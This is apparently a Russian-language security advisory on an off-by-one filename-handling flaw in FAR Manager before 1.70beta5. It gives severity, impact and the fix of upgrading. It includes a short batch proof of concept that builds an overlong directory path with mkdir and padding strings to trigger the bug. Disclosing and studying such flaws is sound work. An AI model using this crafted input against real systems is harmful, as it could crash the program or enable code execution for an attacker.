Дата публикации: | 12.02.2003 |
Дата изменения: | 23.04.2007 |
Всего просмотров: | 1643 |
Опасность: | Низкая |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Локальная |
Воздействие: | Повышение привилегий |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | FAR Manager 1.70 |
Уязвимые версии: Far Manager версии до 1.70beta5.
Описание: Ошибка завышения на единицу обнаружена при обработке имен файлов. Удаленный пользователь может создать специально сформированное имя файла, длиной 160 символов и выполнить произвольный код на целевой системе с привилегиями пользователя, запустившего приложение. Пример:
@echo off SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA SET B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB mkdir \\?\c:\%A% mkdir \\?\c:\%A%\%A% mkdir \\?\c:\%A%\%B%\ URL производителя: www.rarlab.com/far_manager.htm Решение: Установите последнюю версию (1.70beta5 или выше) с сайта производителя. |